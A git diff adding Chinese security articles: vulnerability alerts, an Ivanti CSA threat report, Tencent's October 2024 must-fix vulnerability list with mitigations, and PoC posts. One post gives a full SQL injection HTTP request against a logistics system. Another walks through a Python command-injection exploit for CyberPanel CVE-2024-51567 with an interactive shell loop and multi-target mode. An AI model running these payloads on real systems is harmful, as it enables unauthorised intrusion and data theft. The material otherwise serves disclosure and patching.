】SRM智联云采系统存在多处SQL注入漏洞.md @@ -0,0 +1,66 @@ +# 【漏洞预警 】SRM智联云采系统存在多处SQL注入漏洞 + thelostworld 2024-11-20 01:25 + +免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!马赛克安全实验室情报申明(可点击查看) +![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McRicPjtibQUDC6OnlQyWCzfd68f5ycicia6CCgOhrqkvHfLj5ajt2SKLnWoZSh219zUS3eTcERBwhxu9Dg/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + + +0x01产品介绍 + +**智互联(深圳)科技有限公司的SRM智联云采系统旨在解决企业供应链管理的挑战,同时满足企业智能化转型升级的需求。该系统利用人工智能、物联网、大数据和云技术,通过一套集成的软硬件解决方案,助力企业在供应商关系管理方面实现线上、移动和智能化。这种转型有助于提高采购效率和协同作业效率,同时规避供需风险,并增强供应链整合能力,打造企业间的共赢生态。** + +****0x02产品指纹 +**** +``` +title=="SRM 2.0" +``` + +![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McR8dBVVZwEU6KNePFVVibEd98jzE9q6zAcQR6Ojv1vCrcJbcY6PecNmzyzgibH1f15y5z0pWFceOBib7Q/640?wx_fmt=png&from=appmsg "") + +0x03漏洞复现 +**SRM智联云采系统多个接口存在多处SQL注入漏洞** +``` +/adpweb/api/srm/delivery/quickReceiptDetail?orderBy= +/adpweb/static/..;/a/sys/sysMessage/statusList?companyName= +/adpweb/a/ica/api/testService +/adpweb/static/%2e%2e;/a/srm/inquiry/getSuppliers?code= +/adpweb/api/srm/delivery/receiptDetail?orderBy= +``` + +![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McRicN3LXNjSdTupHW153a79nHEDmVZRn1c3XDPsZwBmGicPL6DJvxbmkRUsxoje2Y1uZ0QOQuJAjvyQA/640?wx_fmt=png&from=appmsg "") + +![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McR8dBVVZwEU6KNePFVVibEd981L1PFdC0580TeHYURlZcNWRrLqW3nicXxalP7DtiaDiaAgBDEcmCWx0icQ/640?wx_fmt=png&from=appmsg "") + +![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McR8dBVVZwEU6KNePFVVibEd98J7uX49Yw64aiaXAPVvKq67F4BBiab3wsbt8Ha5uewuhOsuHb58hMDwtw/640?wx_fmt=png&from=appmsg "") + +![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McR8dBVVZwEU6KNePFVVibEd98xgw9pfXibz8ELjAdC3iaTOdUiasfctuEm7yib3miaHN4wCp7fahEo7TPyEA/640?wx_fmt=png&from=appmsg "") + + +0x04扫码加入星球查看详情 + + + +**扫描加入星球不迷路** + +![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McRibMUiczLZevyribRn1qUpneDyfgJROGIibTVTjgVeErEr7icQzaVX1hBUfB2c4e2lUHP7EhUia0pvKe7Lg/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + +![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McRicPjtibQUDC6OnlQyWCzfd68iabQ9Vb5JGMNXqnzJTc28tomdyWugPkbLp6Kgc9tECG2XXPMTiafwTAw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + + +0x05星球介绍 + +**马赛克安全** + +**专注于漏洞情报分享,不发烂大街的东西。星球外面的兄弟欢迎进来白嫖,不满意三天退款。放心大胆的进来嫖!!!** + +**很多漏洞均为全网首发的0day/1day,目前星球已累计发送440个漏洞POC脚本,有没有价值,只有体会才知道!!!** + + +![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McR8kpbPfI7MzqMym38qXjrxZOLJCJwiadXUhF10gcSbRQXn1Zjr3IDn1EeLOtq32y3t9gsbHtpdLsaQ/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + +**** + + + + + diff --git a/doc/【漏洞预警】东胜物流软件-certupload-任意文件上传漏洞.md b/doc/【漏洞预警】东胜物流软件-certupload-任意文件上传漏洞.md index 33e7cf3c..c9c2b572 100644 --- a/doc/【漏洞预警】东胜物流软件-certupload-任意文件上传漏洞.md +++ b/doc/【漏洞预警】东胜物流软件-certupload-任意文件上传漏洞.md @@ -1,5 +1,5 @@ # 【漏洞预警】东胜物流软件-certupload-任意文件上传漏洞 - thelostworld 2024-11-18 09:53 + thelostworld 2024-11-20 01:25 免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!马赛克安全实验室情报申明(可点击查看) ![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McRicPjtibQUDC6OnlQyWCzfd68f5ycicia6CCgOhrqkvHfLj5ajt2SKLnWoZSh219zUS3eTcERBwhxu9Dg/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") diff --git a/doc/上周关注度较高的产品安全漏洞(20241111-20241117).md b/doc/上周关注度较高的产品安全漏洞(20241111-20241117).md index 6a3397de..3904a94b 100644 --- a/doc/上周关注度较高的产品安全漏洞(20241111-20241117).md +++ b/doc/上周关注度较高的产品安全漏洞(20241111-20241117).md @@ -1,5 +1,5 @@ # 上周关注度较高的产品安全漏洞(20241111-20241117) - 深信服千里目安全技术中心 2024-11-19 08:57 + 国家互联网应急中心CNCERT 2024-11-19 06:49 **一、境外厂商产品漏洞** diff --git a/doc/国家级黑客利用三大 Ivanti CSA 零日漏洞展开攻击,企业需警惕!.md b/doc/国家级黑客利用三大 Ivanti CSA 零日漏洞展开攻击,企业需警惕!.md new file mode 100644 index 00000000..2888c0e2 --- /dev/null +++ b/doc/国家级黑客利用三大 Ivanti CSA 零日漏洞展开攻击,企业需警惕!.md @@ -0,0 +1,55 @@ +# 国家级黑客利用三大 Ivanti CSA 零日漏洞展开攻击,企业需警惕! +原创 紫队 紫队安全研究 2024-11-20 03:59 + +**大家好,我是紫队安全研究。建议大家把公众号“紫队安全研究”设为星标,否则可能就无法及时看到啦!因为公众号现在只对常读和星标的公众号才能大图推送。操作方法:先点击上面的“紫队安全研究”,然后点击右上角的【...】,然后点击【设为星标】即可。** + +![](https://mmbiz.qpic.cn/mmbiz_png/sUKKZDdVP8TtLmcLkFhzswbfPuJ9MR5nzZJCsia6WChciaZXjI2OIjp3H3bZTpwBPOvMKGsCGPEicLILI7BNmdMQQ/640?wx_fmt=png&from=appmsg "") + +在近期网络安全事件中,知名安全厂商Fortinet FortiGuard Labs研究团队警告称,一名疑似国家级黑客组织正在利用Ivanti Cloud Service Appliance(CSA)中的三大零日漏洞对企业网络实施恶意攻击。这次攻击不仅展示了黑客的技术水平,更凸显了网络安全防护的重要性。 + + +一、三大漏洞揭示了什么? + +1. CVE-2024-9380 - Ivanti CSA版本5.0.2之前的操作系统命令注入漏洞,CVSS评分7.2。攻击者需具备管理员权限,一旦成功,可远程执行代码。 + +2. CVE-2024-8190 - 影响Ivanti CSA 4.6 Patch 518及之前版本的命令注入漏洞。此漏洞同样需要攻击者拥有管理员权限,以实现远程代码执行。 + +3. CVE-2024-8963 - Ivanti CSA 4.6 Patch 519之前的路径遍历漏洞,CVSS评分9.4。此漏洞无需认证,攻击者可未经授权访问系统的敏感功能。 + + +二、黑客的攻击链条 + +通过这些漏洞,黑客不仅能够获得CSA设备的未授权访问权限,还能枚举用户信息并试图获取凭据。攻击者利用所获得的管理员凭证在CSA设备上执行命令注入攻击,随后部署了名为“help.php”的Web shell(网络后门)。 + + +在获取访问权限后,黑客通过修改代码以“补丁”漏洞来封锁其它攻击者的入侵。此举表明攻击者试图确保独占的访问权限,进一步巩固对受害网络的控制。 + + +三、攻击工具及持续性 + +研究表明,攻击者使用了ReverseSocks5代理工具来攻击内部网络,并试图部署Linux内核模块rootkit以确保持久性访问。即使系统恢复出厂设置,该rootkit仍有可能在系统中驻留,这加大了企业防御的难度。 + + +四、防护建议 + +面对高超的攻击技巧和零日漏洞链攻击,企业应当采取有效的安全防护措施,尤其是及时更新补丁,并加强网络入侵监控。Ivanti公司和Fortinet建议用户定期检查系统日志,确保CSA设备上没有恶意脚本或后门,同时严格限制CSA设备的访问权限,防止未经授权的访问。 + + +结语 + +本次Ivanti CSA漏洞攻击再次警示企业:网络攻击者技术不断提升,零日漏洞带来的风险不容小觑。企业需积极部署安全策略,确保网络和敏感数据的安全。 + +**** +**** +**推荐阅读:知识星球连载创作"全球高级持续威胁:网络世界的隐形战争",总共26章,相信能够为你带来不一样的世界认知,欢迎感兴趣的朋友****加入沟通交流。** + +![](https://mmbiz.qpic.cn/mmbiz_jpg/sUKKZDdVP8RRAic0GwkHmSw2QZes8kK1AfysU8oPBib56yJpTWxmMuHRQBk3DHtibEASDuO7FTia8jIpeYtMFicBy5A/640?wx_fmt=jpeg "") +![](https://mmbiz.qpic.cn/mmbiz_png/sUKKZDdVP8Sm53HIUuI9RNR5Vpk1TWmpt3dw7icrMOJchapl0qTHsxVnXHyicBmV2kNlgpt3WLGLgdBJKrWiaUGicw/640?wx_fmt=png "") + +**** +**欢迎喜欢文章的朋友点赞、转发、赞赏,你的每一次鼓励,都是我继续前进的动力。** + +**** + + + diff --git a/doc/易思智能物流无人值守系统 ExportReport SQL注入漏洞.md b/doc/易思智能物流无人值守系统 ExportReport SQL注入漏洞.md new file mode 100644 index 00000000..2a04dac8 --- /dev/null +++ b/doc/易思智能物流无人值守系统 ExportReport SQL注入漏洞.md @@ -0,0 +1,112 @@ +# 易思智能物流无人值守系统 ExportReport SQL注入漏洞 +Superhero nday POC 2024-11-20 02:17 + +![](https://mmbiz.qpic.cn/mmbiz_png/Melo944GVOJECe5vg2C5YWgpyo1D5bCkYN4sZibCVo6EFo0N9b7Kib4I4N6j6Y10tynLOdgov9ibUmaNwW5yeoCbQ/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + +![](https://mmbiz.qpic.cn/mmbiz_png/Melo944GVOJECe5vg2C5YWgpyo1D5bCkhic5lbbPcpxTLtLccZ04WhwDotW7g2b3zBgZeS5uvFH4dxf0tj0Rutw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + +![](https://mmbiz.qpic.cn/mmbiz_png/Melo944GVOJECe5vg2C5YWgpyo1D5bCk524CiapZejYicic1Hf8LPt8qR893A3IP38J3NMmskDZjyqNkShewpibEfA/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + +内容仅用于学习交流自查使用,由于传播、利用本公众号所提供的 +POC +信息及 +POC对应脚本 +而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号nday poc及作者不为此承担任何责任,一旦造成后果请自行承担!如文章有侵权烦请及时告知,我们会立即删除文章并致歉。谢谢! + + +**00****** + +**产品简介** + + +易思无人值守智能物流系统只是一款集成了人工智能、机器人技术和物联网技术的创新产品。它能够自主完成货物存储、检索、分拣、装载以及配送等物流作业,帮助企业实现无人值守的智能物流运营,提高效率、降低成本,为现代物流行业带来新的发展机遇,该系统旨在为流程生产企业提供原料采购、产成品销售及厂内物流的统一管控智能信息化平台,通过全企业产供销业务的集成管理,实现无人值守计量、降本增效、机器替代人工,优化物流资源管控体系。 + + +**01****** + +**漏洞概述** + + +易思智能物流无人值守系统 ExportReport SQL注入漏洞,未经身份验证的远程攻击者除了可 +以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + + +**02****** + +**搜索引擎** + + +FOFA:  + +body="/api/SingleLogin" + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwIft3hvROxGJgWGyCYrWkSnFHJ6yu1ZNkEqGXAjYzcj2z6Fia0RgPhicJ15CFOniaHn7Wa8mOYk6woicA/640?wx_fmt=png&from=appmsg "") + + +**03****** + +**漏洞复现** +``` +POST /Sys_ReportFile/ExportReport HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Connection: close + +rep_Ids=1%27%29+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C@@VERSION%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--+CdNX +``` + +查询数据库版本 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwJS7UWPjDeP7ROdo5LP5O42XcdlRkqFovx5t8NmXziaXKQXkC3fsMMdoXKVE3fdR1VkJlzkuKcF0ug/640?wx_fmt=png&from=appmsg "") + +sqlmap验证 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwJS7UWPjDeP7ROdo5LP5O42KZyT4cZibsrNvKMAWXb3FGeXm366VjttanUibebu2L43GPcVuwlCQz9A/640?wx_fmt=png&from=appmsg "") + + +**04** + +**检测工具** + + +nuclei + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwJS7UWPjDeP7ROdo5LP5O42mQga09YXRyibKRFIFh5XhfiaP9ibReGL3t5ia80bXfwnvuticXzcHZ6QKibg/640?wx_fmt=png&from=appmsg "") + +afrog + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwJS7UWPjDeP7ROdo5LP5O42wicibia5jKsBKVeF5ByZSzZQEjbljmKZ606M1HY7ajwbLY6avputhQEGw/640?wx_fmt=png&from=appmsg "") + +xray + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwJS7UWPjDeP7ROdo5LP5O42ARQxXIg5ER9vgwwYfiaoMq2vcVmQ3PMsiaibdICRxZQNhE9PfgtwOhPSg/640?wx_fmt=png&from=appmsg "") + + +**05****** + +**修复建议** + + +1、关闭互联网暴露面或接口设置访问权限 + +2、升级至安全版本 + + +**06****** + +**内部圈子介绍** + + +1、本圈子主要是分享网上公布的1day/nday POC详情及对应检测脚本,目前POC脚本均支持xray、afrog、nuclei等三款常用工具。  + +2、三款工具都支持内置poc+自写poc目录一起扫描。  + +3、保持每周更新10-15个poc。  + +4、所发布的POC脚本均已测试完毕,直接拿来即用。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwI0X77l5WtnpfTexA6RwHXSbf1x3ZyT3bhcbWzRoFLyAgHkSMk9yGaZK5FDGcSCQp9ibPcicxHXIOcg/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&retryload=2&tp=webp "") + + + diff --git a/doc/深入解析 CVE-2024-51567:CyberPanel 命令注入漏洞及 PoC 复现.md b/doc/深入解析 CVE-2024-51567:CyberPanel 命令注入漏洞及 PoC 复现.md new file mode 100644 index 00000000..2267f83a --- /dev/null +++ b/doc/深入解析 CVE-2024-51567:CyberPanel 命令注入漏洞及 PoC 复现.md @@ -0,0 +1,142 @@ +# 深入解析 CVE-2024-51567:CyberPanel 命令注入漏洞及 PoC 复现 +云梦DC 云梦安全 2024-11-20 01:05 + +在近期的安全事件中,CVE-2024-51567 成为了一大焦点。这一漏洞影响 CyberPanel v2.3.6,通过绕过 CSRF 防护和利用特定参数中的 Shell 元字符实现远程命令执行 (RCE)。本文将带您全面了解此漏洞的成因、利用方式及防护措施,并提供一个 Python 漏洞利用脚本的解析示例,帮助大家更好地理解漏洞机制及修复方法。 +## 漏洞概述 +- **CVE 编号:** + CVE-2024-51567 + +- **漏洞类型:** + 命令注入 / CSRF 绕过 + +- **受影响版本:** + CyberPanel v2.3.6 和 v2.3.7(未修复版本) + +- **漏洞文件:**databases/views.py + 中的upgrademysqlstatus + 端点 + +- **漏洞描述:** + 攻击者通过绕过 CSRF 防护(该保护仅限于 POST 请求)并在statusfile + 参数中插入 Shell 元字符,可以执行任意命令。 + +- **公开利用:** + 该漏洞被 PSAUX 团队于 2024 年 10 月发现并公开利用。 + +- ![](https://mmbiz.qpic.cn/mmbiz_png/ndxZsFvkmpxiaKyI98MJklzBBWSGT8MAicSPl8jqtJtjedXvUnqDMuBxdL41FoZe8t1TwSjudWKRQaCo4SUc3dlQ/640?wx_fmt=png&from=appmsg "") + + +## 漏洞利用的 PoC 原理 + +漏洞利用的核心步骤包括: +1. **获取 CSRF Token:** + 攻击者从目标服务器的 Cookie 中提取 CSRF Token。 + +1. **构造恶意 Payload:** + 在请求中利用statusfile + 参数嵌入恶意命令,伪装为合法请求发送到upgrademysqlstatus + 端点。 + +1. **命令注入:** + 服务端错误地执行了嵌入的恶意命令,实现远程命令执行。 + +以下是漏洞利用的关键代码逻辑: + +``` +payload = {"statusfile":f";{cmd} ;"} headers = {"X-CSRFToken": csrf_token,"Referer": target_url } response = client.post(f"{target_url}/dataBases/upgrademysqlstatus", headers=headers, data=payload) +``` + + +## PoC 脚本解析 + +以下是针对该漏洞的 PoC 脚本,具备交互式命令输入、CSRF Token 获取和多目标支持等功能。 +### 脚本核心功能 +1. **CSRF Token 获取** +脚本通过 HTTPX 客户端获取目标服务器的 CSRF Token: + + + +1. ``` +defget_CSRF_token(client, target_url): response = client.get(target_url)return response.cookies.get("csrftoken") +``` + +**命令注入** +构造恶意请求并发送到漏洞端点: + + + +1. +1. ``` +defpwn(client, target_url, csrf_token, cmd): payload = {"statusfile":f";{cmd} ;"} headers = {"X-CSRFToken": csrf_token} response = client.post(f"{target_url}/dataBases/upgrademysqlstatus", headers=headers, data=payload)print(response.text) +``` + +**交互式模式** +脚本支持多次命令执行,直至用户输入exit +: + + + +1. +``` +whileTrue: cmd =input("shell> ")if cmd.lower() =="exit":break pwn(client, target_url, csrf_token, cmd) +``` +### +## 使用方法 +### 1.环境准备 +- Python 3 环境 + +- 安装httpx + 模块:``` +pip install httpx + +``` + + +- +### 2.单目标测试 + +运行以下命令: + +``` +python CVE-2024-51567.py http://example.com +``` + + +### 3.多目标测试 + +将目标 URL 列表保存到targets.txt + 文件中,一行一个 URL: + +``` +http://target1.com http://target2.com http://target3.com +``` + + + +运行脚本: + +``` +python CVE-2024-51567.py targets.txt +``` + +POC地址: + +https://github.com/ajayalf/CVE-2024-51567 + +注:POC来源于网络仅供参考与测试使用 + +## 漏洞修复建议 +1. **升级 CyberPanel:** + 官方已在 +commit 5b08cd6 + 中修复了该漏洞,建议用户立即升级至最新版本。 + +1. **加强 CSRF 防护:** + 确保所有端点(包括 GET 和 POST 请求)均具备全面的 CSRF 防护。 + +1. **输入参数校验:** + 对所有用户输入进行严格的参数校验,防止命令注入。 + +1. **访问权限控制:** + 限制敏感端点的访问,仅允许授权用户操作。 + diff --git a/doc/漏洞预警 | 全程云OA SQL注入漏洞.md b/doc/漏洞预警 | 全程云OA SQL注入漏洞.md new file mode 100644 index 00000000..38607870 --- /dev/null +++ b/doc/漏洞预警 | 全程云OA SQL注入漏洞.md @@ -0,0 +1,44 @@ +# 漏洞预警 | 全程云OA SQL注入漏洞 +浅安 浅安安全 2024-11-20 00:02 + +**0x00 漏洞编号** +- # 暂无 + +**0x01 危险等级** +- 高危 + +**0x02 漏洞概述** + +全程云OA一体化协同办公软件是全程云出品企业一体化管理软件,为企业内部协同办公管理提供了高效的软件解决方案。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/7stTqD182SUP55gXJX9UnHyoOUYLPM7fI1iaLlgBxHvanq736GZjjRBBPSQ9E4kIvrWib1ia6DZI0rsAWPgYNbTNw/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + +**0x03 漏洞详情** +### +### + +**漏洞类型:** +SQL注入 + +**影响:** +获取敏感信息 + +**简述:** +全程云OA的/OA/PES/QCPES.asmx接口处存在多处SQL注入漏洞,未经身份验证的攻击者可以通过该漏洞拼接执行任意SQL语句,从而获取数据库敏感信息。 +### + +**0x04 影响版本** +- 全程云OA + +**0x05****POC状态** +- 已公开 + +**** +**0x06****修复建议** + +**目前官方已发布漏洞修复版本,建议用户升级到安全版本****:** + +https://www.eqccd.com/ + + + diff --git a/doc/腾讯安全威胁情报中心推出2024年10月必修安全漏洞清单.md b/doc/腾讯安全威胁情报中心推出2024年10月必修安全漏洞清单.md new file mode 100644 index 00000000..6ec68c3b --- /dev/null +++ b/doc/腾讯安全威胁情报中心推出2024年10月必修安全漏洞清单.md @@ -0,0 +1,661 @@ +# 腾讯安全威胁情报中心推出2024年10月必修安全漏洞清单 +原创 腾讯威胁情报中心 安全攻防团队 2024-11-20 01:37 + +所谓必修漏洞,就是运维人员必须修复、不可拖延、影响范围较广的漏洞,被黑客利用并发生入侵事件后,会造成十分严重的后果。 + +腾讯安全威胁情报中心参考“安全漏洞的危害及影响力、漏洞技术细节披露情况、该漏洞在安全技术社区的讨论热度”等因素,综合评估该漏洞在攻防实战场景的风险。当漏洞综合评估为风险严重、影响面较广、技术细节已披露,且被安全社区高度关注时,就将该漏洞列入必修安全漏洞候选清单。  + + +腾讯安全威胁情报中心定期发布安全漏洞必修清单,以此指引政企客户安全运维人员修复漏洞,从而避免重大损失。  +**以下是2024年10月份必修安全漏洞清单**: + +‍‍‍ +一、Apache Solr 身份验证绕过漏洞(CVE-2024-45216) + +二、 +CyberPanel 远程代码执行漏洞(CVE-2024-51567) + +三、Redis 缓冲区溢出漏洞(CVE-2024-31449) + +四、Weblogic Server T3/IIOP  +远程代码执行漏洞(CVE-2024-21216) + +五、Fortinet FortiManager 身份认证绕过 +漏洞(CVE-2024-47575) + +六、Kubernetes Image Builder 默认凭据登录 +漏洞(CVE-2024-9486) + +七、Spring Framework 路径遍历漏洞(CVE-2024-38819) + +八、GitLab EE 权限绕过漏洞(CVE-2024-9164) + +九、ThinkPHP 反序列化漏洞(CVE-2024-48112) + +十、Mozilla Firefox Animation timelines 释放后重用漏洞(CVE-2024-9680) + +‍‍‍ + +**漏洞介绍及修复建议详见后文** + + +**一、****Apache Solr 身份验证绕过漏洞** + +**** +**** +**概述:** + +腾讯安全近期监测到Apache官方发布了关于Solr的风险公告,漏洞编号:TVD-2024-28124。(CVE编号:CVE-2024-45216,CNNVD编号:CNNVD-202410-1596)。成功利用此漏洞的攻击者,最终可绕过权限验证访问受限页面。 + +Apache Solr是一款基于Apache Lucene的开源搜索平台,它不仅提供了快速、准确的全文搜索功能,还具备实时数据分析的能力。Solr的设计使其能够轻松处理大规模数据集,并通过高度可定制的排序、过滤和评分机制来优化搜索结果。此外,Solr支持多种数据格式和编程接口,包括XML、JSON以及Java、Python等多种语言的客户端库,极大地方便了开发者的集成工作。 + +据描述,该漏洞源于Solr中的 PKIAuthenticationPlugin 存在认证逻辑错误,攻击者可以将特定路径拼接至URL末尾绕过权限验证,最终访问任意路由,从而获取敏感数据或进行其他恶意操作。 + +**漏洞状态:** +
类别
状态
安全补丁
已公开
漏洞细节
已公开
PoC
已公开
在野利用
已发现
+ +**风险等级:** +
评定方式
等级
威胁等级
高危
影响面
攻击者价值
利用难度
漏洞评分
9.8
+ +**影响版本:** + +5.3.0 <= Apache Solr < 8.11.4 + +9.0.0 <= Apache Solr < 9.7.0 + + +**修复建议:** + +1 +. +官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本。 + + +【备注】:建议您在升级前做好数据备份工作,避免出现意外。 + +https://solr.apache.org/downloads.html + +2. 临时缓解方案: + +- 如非必要,避免将Apache Solr开放至公网。 + +- 设置白名单访问。 + +**二、****CyberPanel 远程代码执行漏洞** + +**** +**** +**** +**** +**概述:** + +腾讯安全近期监测到CyberPanel官方发布了关于CyberPanel的风险公告,漏洞编号:TVD-2024-29503 (CVE编号:CVE-2024-51567,CNNVD编号:CNNVD-202410-3421)。成功利用此漏洞的攻击者,最终可远程执行任意代码。 + +CyberPanel是一款强大且易于使用的控制面板,专为Web hosting和网站管理设计。它提供了直观的用户界面,让用户能够轻松管理虚拟主机、域名、电子邮件账户、数据库等资源。CyberPanel还具备一键安装LAMP/WAMP环境、强大的备份和恢复功能。此外,其高性能和稳定性确保了用户的网站能够顺畅运行。 + +该漏洞源于CyberPanel中的 upgrademysqlstatus接口权限校验功能存在缺陷,且CyberPanel中的secMiddleware只对POST请求传输的内容进行恶意字符过滤。攻击者可以通过获取到的csrf token绕过权限校验,并构造非POST请求的恶意请求,最终远程执行任意代码。 + +**漏洞状态:** +
类别
状态
安全补丁
已公开
漏洞细节
已公开
PoC
已公开
在野利用
已发现
+ +**风险等级:** +
评定方式
等级
威胁等级
高危
影响面
攻击者价值
利用难度
漏洞评分
9.8
+ +**影响版本:** + +CyberPanel < 2.3.8 + +**修复建议:** + +1. 官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本。 + +【备注】:建议您在升级前做好数据备份工作,避免出现意外。 + + +https://cyberpanel.net/blog/detials-and-fix-of-recent-security-issue-and-patch-of-cyberpanel + +2. 临时缓解方案: + +- 如非必要,避免开放CyberPanel服务至公网。 + +- 设置白名单访问。 + + + + + +**三、****Redis 缓冲区溢出漏洞** + +**** +**** +**** +**概述:** + +腾讯安全近期监测到关于Redis的风险公告,漏洞编号为TVD-2024-26971 (CVE编号:CVE-2024-31449,CNNVD编号:CNNVD-202410-612)。成功利用此漏洞的攻击者,可能触发远程代码执行。 + +Redis是一款开源的高性能键值对存储数据库,它以内存为数据存储介质,提供了快速的数据读写能力。Redis支持多种数据结构,如字符串、哈希表、列表、集合和有序集合等,同时还具备发布订阅、事务、Lua脚本处理等功能。因其出色的性能和丰富的功能,Redis被广泛应用于缓存、消息队列、实时分析等场景,成为现代互联网应用中不可或缺的技术组件。 + +据描述,该漏洞源于Redis 中的Lua库存在代码缺陷,经过身份验证的攻击者可通过发送特制的Lua脚本触发堆栈缓冲区溢出,最终可能导致远程代码执行。 + +**漏洞状态:** +
类别
状态
安全补丁
已公开
漏洞细节
已公开
PoC
已公开
在野利用
未发现
+ +**风险等级:** +
评定方式
等级
威胁等级
高危
影响面
攻击者价值
利用难度
漏洞评分
7.0
+ +**影响版本:** + +Redis 开源/社区版 < 6.2.16 + +Redis 开源/社区版 < 7.2.6 + +Redis 开源/社区版 < 7.4.1 + +Redis Stack < 6.2.6-v17 + +Redis Stack < 7.2.0-v13 + +Redis Stack < 7.4.0-v1 + +Redis 商业版 < 6.4.2-110 + +Redis 商业版 < 7.2.4-109 + +Redis 商业版 < 7.4.2-169 + +Redis 商业版 < 7.4.6 + +**修复建议:** + +1. 官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本。 + +【备注】:建议您在升级前做好数据备份工作,避免出现意外。 + + +https://github.com/redis/redis/releases + +2. +临时缓解方案: + +- 利用安全组设置Redis仅对可信地址开放。 + +- 强制对Redis实例的所有访问使用凭据。 + +- 设置用户权限,仅允许受信任的身份运行Lua脚本或任何其他潜在危险的命令。 + +**四、****WebLogic Server T3/IIOP远程命令执行漏洞** + +**** +**** + +**** +**概述:** + +腾讯安全近期监测到 +Oracle +官方发布了 +WebLogic +的风险公告,漏洞编号为 +TVD-2024-27951 (CVE +编号: +CVE-2024-21216 +, +CNNVD +编号: +CNNVD-202410-1425) +。成功利用此漏洞的攻击者,最终可以远程执行任意代码。 + +WebLogic是Oracle公司开发的一款企业级应用服务器,它提供了强大的Web应用程序和EJB容器的功能,支持Java EE标准。WebLogic可以作为开发和部署企业应用的平台,提供了诸如事务管理、安全性、集群、负载均衡以及可扩展性等关键特性,旨在简化企业级应用的开发、部署和管理。因其稳定性和强大的功能集,WebLogic在企业级应用中得到了广泛的应用。 + +据描述,该漏洞源于Weblogic存在代码缺陷,攻击者可以通过T3/IIOP协议发送特制的请求触发反序列化漏洞,最终远程执行任意代码。 + +**漏洞状态:** +
类别
状态
安全补丁
已公开
漏洞细节
已公开
PoC
已公开
在野利用
已发现
+ +**风险等级:** +
评定方式
等级
威胁等级
高危
影响面
攻击者价值
利用难度
漏洞评分
9.8
+ +**影响版本:** + +WebLogic 12.2.1.4.0 + +WebLogic 14.1.1.0.0 + +**修复建议:** + +1.  +官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本。 + +【备注】:建议您在升级前做好数据备份工作,避免出现意外。 + +https://www.oracle.com/security-alerts/cpuoct2024.html + + +2.  +临时缓解方案 + +- +禁用 +T3协议,登录 +weblogic后台页面,在 +base_domain的配置页面中,进入 +“安全 +”选项卡页面,点击 +“筛选器 +”,进入连接筛选器配置。在连接筛选器中输入: +``` +WebLogic.security.net.ConnectionFilterImpl +``` + + +参考以下写法,在连接筛选器规则中进行配置: +``` +127.0.0.1 * * allow t3 t3s +* * * deny t3 t3s +``` + +- +禁用 +IIOP协议,登录 +weblogic后台页面,在左侧菜单页中点击 环境 +->服务器 +->AdminServer->协议 +->IIOP,取消勾选 +“启动 +IIOP”。 + + +**五、****Fortinet FortiManager 身份认证绕过漏洞** + +**** +**** +**** +**概述:** + +腾讯安全近期监测到Fortinet官方发布了关于FortiManager的风险公告,漏洞编号为TVD-2024-29074 (CVE编号:CVE-2024-47575,CNNVD编号:CNNVD-202410-2613),未经身份验证的远程攻击者可以利用该漏洞绕过身份验证,远程执行任意代码。 + +FortiManager 是 Fortinet 公司推出的一款强大的集中式网络安全管理解决方案。它通过提供一个统一的界面,简化了对 